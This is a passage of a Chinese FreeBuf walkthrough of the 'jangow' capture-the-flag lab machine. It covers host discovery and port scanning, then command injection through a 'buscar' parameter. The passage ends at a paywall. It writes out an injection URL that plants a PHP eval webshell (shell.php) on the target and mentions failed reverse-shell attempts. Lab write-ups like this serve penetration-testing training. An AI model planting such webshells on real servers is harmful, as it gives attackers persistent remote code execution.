freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

jangow 靶场完整解析
Koi 2024-03-11 12:59:52 90844

注意!

使用VMware可能获取不到IP,解决方案参考连接:

https://blog.csdn.net/qq_41918771/article/details/103636890

一、环境搭建

kali的IP地址:192.168.200.14

jangow靶机的IP地址:未知

二、信息收集

1.存活主机

netdiscover -r 192.168.200.0/24

可知目标IP 地址为 192.168.200.18

1710132711_65ee8de74f75ded6b6b7b.jpg!small?1710132711956

2.开放端口

nmap -A -p 1-65535 192.168.200.18

nmap -p 1-65535 -A -sV 192.168.200.18

1710132720_65ee8df0cc90769b7009d.jpg!small?1710132721404

80端口和21端口 开放

访问80端口

1710132742_65ee8e060ba1f423d8760.jpg!small?1710132742757

依次查看不同页面

buscar这个页面有问题,什么都不显示

1710132766_65ee8e1eca8de9c356029.jpg!small?1710132767295

buscar= 这算是缺少参数,尝试用命令执行,可以看到命令被成功执行

1710132780_65ee8e2c7766464f4e698.jpg!small?1710132780918

三、反弹shell

直接利用kali进行端口监听,反弹shell

bash连不上

1710132789_65ee8e357b996bb77407e.jpg!small?1710132790126

nc 也是不行

1710132799_65ee8e3f176a80e05ed94.jpg!small?1710132799618

常规的反弹shell方法都被限制了

用一句话木马写入,获取shell的方式反弹

http://192.168.200.18/site/busque.php?buscar=echo '<?php @eval($_POST['666']); ?>' >> shell.php

查看含有一句话木马的文件是否被写入到目标服务器

1710132814_65ee8e4ea2dcf623d4d5a.jpg!small?1710132815153

成功写入

连接蚁剑

成功连接

1710132825_65ee8e59288ecc

可试读前30%内容
¥ 9.9 全文查看
9.9元开通FVIP会员
畅读付费文章
最低0.3元/天
# 网络安全 # web安全 # 网络安全技术
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 Koi 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
靶机练习
Koi LV.6
每个人都是都是独一无二的个体。
  • 41 文章数
  • 28 关注者
Noob 靶场完整解析
2024-03-23
Al-Web-1.0 靶机 渗透测试
2024-03-20
Vulhub 练习 DC-4靶机完整复现
2024-03-11
文章目录